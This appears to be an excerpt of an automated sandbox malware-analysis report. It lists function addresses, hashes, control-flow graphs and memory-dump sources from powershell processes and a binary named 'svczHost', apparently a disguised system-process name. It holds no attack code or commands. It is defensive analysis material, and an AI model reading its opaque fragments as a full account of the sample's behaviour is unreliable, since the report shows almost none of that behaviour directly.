                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HlD$XlD$hlD$xlD
                                                                                    • API String ID: 0-3930319464
                                                                                    • Opcode ID: 301d3135ce2deb522b5bb404750cc732585762178fa1497718d223a23d0f560d
                                                                                    • Instruction ID: d0708d5584ac7adcffeb4df5e1aa03796563c9d50eda044ce58a6bef69f95464
                                                                                    • Opcode Fuzzy Hash: 301d3135ce2deb522b5bb404750cc732585762178fa1497718d223a23d0f560d
                                                                                    • Instruction Fuzzy Hash: 84F0E98B70F8D28BFA29D25C7C5A1780A92E7B671473D41FBC0885B1CF8455DE0AC399

                                                                                    Executed Functions

                                                                                    Function 00007FFC44B4ED40 Relevance: .1, Instructions: 124COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2662479975.00007FFC44B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44B4D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffc44b4d000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f8d277e6776d98e6c1a5cf3d484dc51442b80eefd52714886802ed243163d74e
                                                                                    • Instruction ID: 82db9e25cb441a0cbfa11d16e36d8c47b08c2f53373c8d33900590c0b9e994b9
                                                                                    • Opcode Fuzzy Hash: f8d277e6776d98e6c1a5cf3d484dc51442b80eefd52714886802ed243163d74e
                                                                                    • Instruction Fuzzy Hash: B641153140DFC84FE7569B2C9C819523FF1EF57220B1506DFD488CB5A7D629A846C7A2
                                                                                    Function 00007FFC44C63C85 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.2663148220.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c5b2cb8cc9a0e55fbbfb1a2340eee561f502a2852de771619b99042b0fbe9a9
                                                                                    • Instruction ID: 6a546ca8f82e36a2f0a26e9802c3440bcfd94f719a3d87b261cb2b7330308daa
                                                                                    • Opcode Fuzzy Hash: 1c5b2cb8cc9a0e55fbbfb1a2340eee561f502a2852de771619b99042b0fbe9a9
                                                                                    • Instruction Fuzzy Hash: B601677111CB0C4FD744EF0CE491AA5B7E0FB95324F50056EE58AC36A5DA36E892CB45

                                                                                    Execution Graph

                                                                                    Execution Coverage:4.8%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:0%
                                                                                    Total number of Nodes:3
                                                                                    Total number of Limit Nodes:0
                                                                                    execution_graph 7745 7ffc44c6e08a 7746 7ffc44c6e6a0 LoadLibraryExW 7745->7746 7748 7ffc44c6e72d 7746->7748

                                                                                    Executed Functions

                                                                                    Function 00007FFC44D3AB91 Relevance: 9.0, Strings: 6, Instructions: 1537COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3441238038.00007FFC44D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44D30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc44d30000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &$8RD$8RD$pRD$pRD$RD
                                                                                    • API String ID: 0-1565887385
                                                                                    • Opcode ID: a2a6c9bced4575bd98a99f7cb06a73694f188dd68b9e1fdb9c46d0ca8bab9fd3
                                                                                    • Instruction ID: 4d36949737bbcbb8348459fc27d692b0bd1cc0892f2e436b8c9d346cf1328a0c
                                                                                    • Opcode Fuzzy Hash: a2a6c9bced4575bd98a99f7cb06a73694f188dd68b9e1fdb9c46d0ca8bab9fd3
                                                                                    • Instruction Fuzzy Hash: 1DA24861A0DBDE4FE75AA72888A51B47FE3EF56210B1801FFD449C71A7DD18AC06C362
                                                                                    Function 00007FFC44C6E08A Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 320 7ffc44c6e08a-7ffc44c6e6ef 323 7ffc44c6e6f1-7ffc44c6e6f6 320->323 324 7ffc44c6e6f9-7ffc44c6e72b LoadLibraryExW 320->324 323->324 325 7ffc44c6e733-7ffc44c6e75a 324->325 326 7ffc44c6e72d 324->326 326->325
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3438563615.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 1029625771-0
                                                                                    • Opcode ID: 7105a5a82a9c3e0854d44faf45b05ed2cd311cd6562ec5a72ce8cd3f02f3d58d
                                                                                    • Instruction ID: 01cd3ba3f99c45837ed3155c140120a167cc000b4d34590aa9d17ac8c3a75f1b
                                                                                    • Opcode Fuzzy Hash: 7105a5a82a9c3e0854d44faf45b05ed2cd311cd6562ec5a72ce8cd3f02f3d58d
                                                                                    • Instruction Fuzzy Hash: 1C217E71908A2C9FDB58DF9CD449BE9BBE1FB69311F10822BD00AD3651DB70A445CB91
                                                                                    Function 00007FFC44D3B27F Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 328 7ffc44d3b27f-7ffc44d3b28b 330 7ffc44d3b291-7ffc44d3b294 328->330 331 7ffc44d3b355-7ffc44d3b35f 328->331 332 7ffc44d3b296-7ffc44d3b2a9 330->332 333 7ffc44d3b2ab 330->333 334 7ffc44d3b361-7ffc44d3b36f 331->334 335 7ffc44d3b370-7ffc44d3b426 331->335 338 7ffc44d3b2ad-7ffc44d3b2af 332->338 333->338 367 7ffc44d3b427-7ffc44d3b429 335->367 338->331 339 7ffc44d3b2b5-7ffc44d3b2bb 338->339 341 7ffc44d3b2bd-7ffc44d3b2ca 339->341 342 7ffc44d3b2d7-7ffc44d3b2dd 339->342 341->342 348 7ffc44d3b2cc-7ffc44d3b2d5 341->348 344 7ffc44d3b2df-7ffc44d3b2f7 342->344 345 7ffc44d3b2f9-7ffc44d3b32c 342->345 344->345 356 7ffc44d3b332-7ffc44d3b33a 345->356 348->342 358 7ffc44d3b33c-7ffc44d3b340 356->358 359 7ffc44d3b342-7ffc44d3b347 356->359 360 7ffc44d3b348-7ffc44d3b354 358->360 359->360 367->367 368 7ffc44d3b42b-7ffc44d3b47f 367->368 374 7ffc44d3b481 368->374 375 7ffc44d3b486-7ffc44d3b497 368->375 374->375 376 7ffc44d3b483 374->376 377 7ffc44d3b49e-7ffc44d3b536 375->377 378 7ffc44d3b499 375->378 376->375 382 7ffc44d3b53c-7ffc44d3b546 377->382 383 7ffc44d3b665-7ffc44d3b6d3 377->383 378->377 379 7ffc44d3b49b 378->379 379->377 384 7ffc44d3b55f-7ffc44d3b564 382->384 385 7ffc44d3b548-7ffc44d3b555 382->385 415 7ffc44d3b6d4-7ffc44d3b6d6 383->415 387 7ffc44d3b605-7ffc44d3b60f 384->387 388 7ffc44d3b56a-7ffc44d3b56d 384->388 385->384 392 7ffc44d3b557-7ffc44d3b55d 385->392 390 7ffc44d3b611-7ffc44d3b61f 387->390 391 7ffc44d3b620-7ffc44d3b662 387->391 393 7ffc44d3b56f-7ffc44d3b578 388->393 394 7ffc44d3b584-7ffc44d3b588 388->394 391->383 392->384 393->394 394->387 401 7ffc44d3b58a-7ffc44d3b590 394->401 404 7ffc44d3b5ac-7ffc44d3b5dc 401->404 405 7ffc44d3b592-7ffc44d3b59f 401->405 419 7ffc44d3b5e2-7ffc44d3b5ea 404->419 405->404 409 7ffc44d3b5a1-7ffc44d3b5aa 405->409 409->404 415->415 417 7ffc44d3b6d8-7ffc44d3b727 415->417 428 7ffc44d3b72e-7ffc44d3b73f 417->428 429 7ffc44d3b729 417->429 420 7ffc44d3b5ec-7ffc44d3b5f0 419->420 421 7ffc44d3b5f2-7ffc44d3b5f7 419->421 423 7ffc44d3b5f8-7ffc44d3b604 420->423 421->423 431 7ffc44d3b741 428->431 432 7ffc44d3b746-7ffc44d3b80b 428->432 429->428 430 7ffc44d3b72b 429->430 430->428 431->432 433 7ffc44d3b743 431->433 433->432
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3441238038.00007FFC44D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44D30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc44d30000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: pRD
                                                                                    • API String ID: 0-2566360566
                                                                                    • Opcode ID: dd43117f09dedc8e3ee773fa8386bbe2b51d1a21833b80bb0dad0d95ab4fda17
                                                                                    • Instruction ID: e96f90d11c10af2f13411ac7e1e7d2868c6db3cc9debec9bf9f86580c76689ad
                                                                                    • Opcode Fuzzy Hash: dd43117f09dedc8e3ee773fa8386bbe2b51d1a21833b80bb0dad0d95ab4fda17
                                                                                    • Instruction Fuzzy Hash: 2B21A022A0DA6F4FEBADE71894D127866D3EF44311B6901BAD80EC71EBCE18EC05C755
                                                                                    Function 00007FFC44D329A6 Relevance: 1.1, Instructions: 1095COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3441238038.00007FFC44D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44D30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc44d30000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 546fe294b9144fd47477c370c6f4f15c0abf8d2a06b8e74100cc1008762e28e9
                                                                                    • Instruction ID: 0bbbb2a60af5e689abeb80db1ba878bfc45ce61408911e86af17880ecc79400a
                                                                                    • Opcode Fuzzy Hash: 546fe294b9144fd47477c370c6f4f15c0abf8d2a06b8e74100cc1008762e28e9
                                                                                    • Instruction Fuzzy Hash: 2672E231E0DA9E4FEB99EB18C8A5674B7E3EF55300F6801B9D80DC719ADE25AC42C351
                                                                                    Function 00007FFC451921ED Relevance: .8, Instructions: 844COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 680 7ffc451921ed-7ffc45192279 685 7ffc45192905-7ffc4519295c 680->685 686 7ffc4519227f-7ffc45192289 680->686 702 7ffc4519295d-7ffc4519295f 685->702 687 7ffc4519228b-7ffc451922a0 686->687 688 7ffc451922a2-7ffc451922aa 686->688 687->688 688->685 689 7ffc451922b0-7ffc451922ba 688->689 692 7ffc451922bc-7ffc451922d1 689->692 693 7ffc451922d3-7ffc451922db 689->693 692->693 693->685 696 7ffc451922e1-7ffc451922eb 693->696 699 7ffc45192304-7ffc45192305 696->699 700 7ffc451922ed-7ffc451922fa 696->700 704 7ffc45192308-7ffc45192314 699->704 700->699 706 7ffc451922fc-7ffc45192302 700->706 702->702 705 7ffc45192961-7ffc45192966 702->705 704->685 707 7ffc4519231a-7ffc45192324 704->707 714 7ffc45192967-7ffc45192969 705->714 706->699 708 7ffc45192326-7ffc45192333 707->708 709 7ffc4519233d-7ffc45192357 707->709 708->709 717 7ffc45192335-7ffc4519233b 708->717 712 7ffc45192396-7ffc451923a2 709->712 713 7ffc45192359-7ffc45192360 709->713 712->685 716 7ffc451923a8-7ffc451923b2 712->716 718 7ffc45192362-7ffc45192365 713->718 714->714 719 7ffc4519296b-7ffc4519299a 714->719 720 7ffc451923b4-7ffc451923c9 716->720 721 7ffc451923cb-7ffc451923d7 716->721 717->709 722 7ffc45192366-7ffc45192368 718->722 720->721 721->718 728 7ffc451923d9-7ffc4519240f 721->728 722->722 727 7ffc4519236a-7ffc4519238e 722->727 727->712 728->685 736 7ffc45192415-7ffc4519241f 728->736 737 7ffc45192439-7ffc451924a5 736->737 738 7ffc45192421-7ffc4519242f 736->738 748 7ffc451924ab-7ffc451924f4 737->748 749 7ffc451928df-7ffc451928f2 737->749 738->737 742 7ffc45192431-7ffc45192437 738->742 742->737 754 7ffc451924f6-7ffc45192502 748->754 755 7ffc4519253a-7ffc45192546 748->755 759 7ffc45192503-7ffc45192505 754->759 757 7ffc45192535 755->757 758 7ffc45192548-7ffc45192552 755->758 757->755 760 7ffc45192554-7ffc45192561 758->760 761 7ffc4519256b-7ffc4519257b 758->761 759->759 763 7ffc45192507-7ffc45192533 759->763 760->761 765 7ffc45192563 760->765 761->757 764 7ffc4519257d-7ffc45192587 761->764 763->755 767 7ffc45192589-7ffc4519259e 764->767 768 7ffc451925a0-7ffc451925d9 764->768 772 7ffc45192564-7ffc45192569 765->772 767->768 768->772 778 7ffc451925db-7ffc4519265d 768->778 772->761 785 7ffc4519265e-7ffc45192671 778->785 785->757 787 7ffc45192677-7ffc45192681 785->787 788 7ffc4519269a-7ffc451926d3 787->788 789 7ffc45192683-7ffc45192698 787->789 788->785 796 7ffc451926d5-7ffc4519272e 788->796 789->788 802 7ffc45192785-7ffc45192799 796->802 803 7ffc4519272f-7ffc45192731 796->803 808 7ffc451927a1-7ffc451927ad 802->808 803->803 804 7ffc45192733-7ffc45192735 803->804 807 7ffc45192738-7ffc45192762 804->807 807->808 812 7ffc45192764-7ffc45192770 807->812 808->807 811 7ffc451927af-7ffc451927d9 808->811 818 7ffc451927da-7ffc451927e1 811->818 815 7ffc45192771-7ffc45192773 812->815 815->815 817 7ffc45192775-7ffc45192784 815->817 817->802 818->685 820 7ffc451927e7-7ffc451927f1 818->820 822 7ffc4519280a-7ffc4519281a 820->822 823 7ffc451927f3-7ffc45192808 820->823 822->685 825 7ffc45192820-7ffc4519282a 822->825 823->822 826 7ffc4519282c-7ffc45192839 825->826 827 7ffc45192843-7ffc4519284f 825->827 826->827 832 7ffc4519283b-7ffc45192841 826->832 827->818 831 7ffc45192851-7ffc4519287b 827->831 836 7ffc45192880-7ffc451928c0 831->836 832->827 836->704 840 7ffc451928c6-7ffc451928da 836->840 840->704
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3456272449.00007FFC45190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45190000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc45190000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3882105aa27dc299ddc240907bc881adfd710b794f26bcb3b7db31de6663fcdb
                                                                                    • Instruction ID: a32c0fc742b228d9d8b8f7a52c1f06c2f7c47ed510c9f8008d9e7d4aecbf8fc9
                                                                                    • Opcode Fuzzy Hash: 3882105aa27dc299ddc240907bc881adfd710b794f26bcb3b7db31de6663fcdb
                                                                                    • Instruction Fuzzy Hash: 4152257190CA9E8FEB99EB288465A787BE2FF55700F1804BDC01DC7197CE29AC45CB61
                                                                                    Function 00007FFC4519299B Relevance: .7, Instructions: 668COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 842 7ffc4519299b-7ffc451929c8 844 7ffc451929c9-7ffc451929cb 842->844 844->844 845 7ffc451929cd-7ffc451929d4 844->845 847 7ffc45192a55-7ffc45192a85 845->847 848 7ffc451929d6-7ffc451929fe 845->848 851 7ffc45192a86-7ffc45192a88 847->851 858 7ffc45192a00-7ffc45192a0c 848->858 859 7ffc45192a52 848->859 851->851 853 7ffc45192a8a-7ffc45192a91 851->853 856 7ffc45192b12-7ffc45192b17 853->856 857 7ffc45192a93-7ffc45192a96 853->857 860 7ffc45192b19 856->860 861 7ffc45192b20-7ffc45192b2f 856->861 866 7ffc45192a99-7ffc45192abb 857->866 867 7ffc45192a0d-7ffc45192a0f 858->867 859->847 860->861 864 7ffc45192b38-7ffc45192b47 861->864 865 7ffc45192b31 861->865 868 7ffc45192b49 864->868 869 7ffc45192b50-7ffc45192b65 864->869 865->864 878 7ffc45192abd-7ffc45192ad2 866->878 879 7ffc45192ad3-7ffc45192ae7 866->879 867->867 870 7ffc45192a11-7ffc45192a18 867->870 868->869 872 7ffc45192b67-7ffc45192b6a 869->872 870->866 875 7ffc45192a1a-7ffc45192a51 870->875 872->872 874 7ffc45192b6c-7ffc45192c0f 872->874 887 7ffc45192c15-7ffc45192c1f 874->887 888 7ffc45192d73-7ffc45192dd1 874->888 885 7ffc45192ae9 879->885 886 7ffc45192af0-7ffc45192aff 879->886 885->886 889 7ffc45192b08-7ffc45192b11 886->889 890 7ffc45192b01 886->890 891 7ffc45192c3b-7ffc45192c48 887->891 892 7ffc45192c21-7ffc45192c39 887->892 909 7ffc45192dd2-7ffc45192dd4 888->909 889->856 890->889 900 7ffc45192d08-7ffc45192d12 891->900 901 7ffc45192c4e-7ffc45192c51 891->901 892->891 903 7ffc45192d14-7ffc45192d24 900->903 904 7ffc45192d25-7ffc45192d70 900->904 901->900 905 7ffc45192c57-7ffc45192c5f 901->905 904->888 905->888 908 7ffc45192c65-7ffc45192c6f 905->908 910 7ffc45192c89-7ffc45192c8f 908->910 911 7ffc45192c71-7ffc45192c7f 908->911 909->909 913 7ffc45192dd6-7ffc45192e27 909->913 910->900 912 7ffc45192c91-7ffc45192c94 910->912 911->910 918 7ffc45192c81-7ffc45192c87 911->918 912->900 916 7ffc45192c96-7ffc45192c99 912->916 937 7ffc45192e29 913->937 938 7ffc45192e30-7ffc45192e3f 913->938 919 7ffc45192c9b-7ffc45192cbe 916->919 920 7ffc45192cc0 916->920 918->910 924 7ffc45192cc2-7ffc45192cc4 919->924 920->924 924->900 926 7ffc45192cc6-7ffc45192cdc 924->926 931 7ffc45192ce3-7ffc45192ceb 926->931 932 7ffc45192ced-7ffc45192cf1 931->932 933 7ffc45192cf3-7ffc45192cf8 931->933 934 7ffc45192cf9-7ffc45192d07 932->934 933->934 937->938 939 7ffc45192e48-7ffc45192ebf 938->939 940 7ffc45192e41 938->940 944 7ffc45192ecb-7ffc45192ed5 939->944 945 7ffc45192ec1-7ffc45192eca 939->945 940->939 946 7ffc45192ed7-7ffc45192edf 944->946 947 7ffc45192ee0-7ffc45192f1f 944->947
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3456272449.00007FFC45190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45190000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc45190000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b771ca8d2d214bc23d2f4f27584da749d67113afc28a175c5cd009ed6babcd4e
                                                                                    • Instruction ID: cb10c2a1b322644ae94e3daaa5e59ab3cd174ab0c3dc669e9741968131005eef
                                                                                    • Opcode Fuzzy Hash: b771ca8d2d214bc23d2f4f27584da749d67113afc28a175c5cd009ed6babcd4e
                                                                                    • Instruction Fuzzy Hash: 7D12486190EADE0FE756E73858655B93FE1EF47220F0809FFD099C70A7D9186806C762
                                                                                    Function 00007FFC45191E51 Relevance: .3, Instructions: 319COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 951 7ffc45191e51-7ffc45191ed7 956 7ffc45191ff4-7ffc45192020 951->956 957 7ffc45191edd-7ffc45191ee7 951->957 965 7ffc4519202c-7ffc4519204e 956->965 966 7ffc45192022-7ffc45192027 956->966 958 7ffc45191ee9-7ffc45191f01 957->958 959 7ffc45191f03-7ffc45191f10 957->959 958->959 967 7ffc45191f95-7ffc45191f9f 959->967 968 7ffc45191f16-7ffc45191f19 959->968 979 7ffc4519204f-7ffc45192051 965->979 966->965 969 7ffc45191fae-7ffc45191ff1 967->969 970 7ffc45191fa1-7ffc45191fad 967->970 968->967 971 7ffc45191f1b-7ffc45191f23 968->971 969->956 971->956 973 7ffc45191f29-7ffc45191f33 971->973 977 7ffc45191f35-7ffc45191f4b 973->977 978 7ffc45191f4c-7ffc45191f50 973->978 977->978 978->967 982 7ffc45191f51-7ffc45191f55 978->982 979->979 983 7ffc45192053-7ffc451920a5 979->983 982->967 984 7ffc45191f57-7ffc45191f5a 982->984 997 7ffc451920a7 983->997 998 7ffc451920a8-7ffc451920b9 983->998 987 7ffc45191f65-7ffc45191f6e 984->987 989 7ffc45191f87-7ffc45191f94 987->989 990 7ffc45191f70-7ffc45191f7d 987->990 990->989 993 7ffc45191f7f-7ffc45191f85 990->993 993->989 997->998 999 7ffc451920bb 998->999 1000 7ffc451920bc-7ffc451920ee 998->1000 999->1000
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3456272449.00007FFC45190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45190000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc45190000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f9cbedb0efb8a18584a06d08da88850866a7f8aaddd06e5fbf48525998f1c6e
                                                                                    • Instruction ID: 8986009d2117f578e55fbdeed4c2550eee591d2d2e236d5f0dc3a04a06219943
                                                                                    • Opcode Fuzzy Hash: 9f9cbedb0efb8a18584a06d08da88850866a7f8aaddd06e5fbf48525998f1c6e
                                                                                    • Instruction Fuzzy Hash: 64917672A0DBED4FEB96E72848146B47FE2EF56210B0805FBC04DC71A7DA189C49C7A1
                                                                                    Function 00007FFC44B4EE20 Relevance: .1, Instructions: 127COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1027 7ffc44b4ee20-7ffc44b4ee59 1030 7ffc44b4ee6a-7ffc44b4ee6c 1027->1030 1031 7ffc44b4ee5b-7ffc44b4ee65 1027->1031 1032 7ffc44b4ee6d-7ffc44b4eedb 1030->1032 1031->1032 1033 7ffc44b4ee67 1031->1033 1035 7ffc44b4eedd-7ffc44b4eee4 1032->1035 1033->1030 1036 7ffc44b4ef0b-7ffc44b4ef20 1035->1036 1037 7ffc44b4eee6-7ffc44b4eeff 1035->1037 1038 7ffc44b4ef03-7ffc44b4ef09 1037->1038 1038->1035
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3436004476.00007FFC44B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44B4D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc44b4d000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3fd93504067db396646702e0da1656928cd0b89139e9c69c3686c7ceabe7d1ea
                                                                                    • Instruction ID: e5fd1c9dff055d4ec2ef556f1cf8247d625b07fe29bd3297651a15958d7aff0f
                                                                                    • Opcode Fuzzy Hash: 3fd93504067db396646702e0da1656928cd0b89139e9c69c3686c7ceabe7d1ea
                                                                                    • Instruction Fuzzy Hash: 1941F27180DBC84FE7569B389C519523FF0EF56220B1909EFD088CB1A7D625A846C7A2
                                                                                    Function 00007FFC44D3B57C Relevance: .1, Instructions: 62COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1059 7ffc44d3b57c-7ffc44d3b588 1061 7ffc44d3b605-7ffc44d3b60f 1059->1061 1062 7ffc44d3b58a-7ffc44d3b590 1059->1062 1063 7ffc44d3b611-7ffc44d3b61f 1061->1063 1064 7ffc44d3b620-7ffc44d3b6d3 1061->1064 1065 7ffc44d3b5ac-7ffc44d3b5dc 1062->1065 1066 7ffc44d3b592-7ffc44d3b59f 1062->1066 1089 7ffc44d3b6d4-7ffc44d3b6d6 1064->1089 1076 7ffc44d3b5e2-7ffc44d3b5ea 1065->1076 1066->1065 1070 7ffc44d3b5a1-7ffc44d3b5aa 1066->1070 1070->1065 1077 7ffc44d3b5ec-7ffc44d3b5f0 1076->1077 1078 7ffc44d3b5f2-7ffc44d3b5f7 1076->1078 1080 7ffc44d3b5f8-7ffc44d3b604 1077->1080 1078->1080 1089->1089 1090 7ffc44d3b6d8-7ffc44d3b727 1089->1090 1096 7ffc44d3b72e-7ffc44d3b73f 1090->1096 1097 7ffc44d3b729 1090->1097 1099 7ffc44d3b741 1096->1099 1100 7ffc44d3b746-7ffc44d3b80b 1096->1100 1097->1096 1098 7ffc44d3b72b 1097->1098 1098->1096 1099->1100 1101 7ffc44d3b743 1099->1101 1101->1100
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3441238038.00007FFC44D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44D30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc44d30000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68bad0fd50a04dfea23286abf4239ddc022fd082f1171c7d8f7fb1f408929335
                                                                                    • Instruction ID: 7d2abaf469aafe16f23a19092b0c4f8a2f936a32a653eb0399030a91319b9d83
                                                                                    • Opcode Fuzzy Hash: 68bad0fd50a04dfea23286abf4239ddc022fd082f1171c7d8f7fb1f408929335
                                                                                    • Instruction Fuzzy Hash: 6A11C222E0D96E4FEAA9E718D4A95B476D3FF0432076900B6D80EC75ABDA18AC00C751
                                                                                    Function 00007FFC45193FD4 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1131 7ffc45193fd4-7ffc45193ff7 1132 7ffc45194001-7ffc4519401c 1131->1132
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.3456272449.00007FFC45190000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC45190000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_13_2_7ffc45190000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3ba6cf24e78aa06385fbd365eb304be782ed678b64209697de205d26b8a5fa86
                                                                                    • Instruction ID: b28942892b955b2c18dfa89a41dc5d0340aebc19bf90ebae5bf551f2a420d365
                                                                                    • Opcode Fuzzy Hash: 3ba6cf24e78aa06385fbd365eb304be782ed678b64209697de205d26b8a5fa86
                                                                                    • Instruction Fuzzy Hash: 9FF0A73131CF044FD744EE1CD845665B3D0FBA8310F10462FE44AC3251DA25E4818782

                                                                                    Non-executed Functions

                                                                                    Function 00007FF70A2BBFE0 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000014.00000002.3849029475.00007FF70A201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF70A200000, based on PE: true
                                                                                    • Associated: 00000014.00000002.3848967184.00007FF70A200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3850109960.00007FF70A67F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3850480563.00007FF70A7F1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3850480563.00007FF70A907000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3850480563.00007FF70A90A000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3851274588.00007FF70AB15000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3851313797.00007FF70AB16000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3851313797.00007FF70AB2F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3851313797.00007FF70AB32000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3851313797.00007FF70AB34000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                    • Associated: 00000014.00000002.3851488883.00007FF70AB37000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_20_2_7ff70a200000_svczHost.jbxd
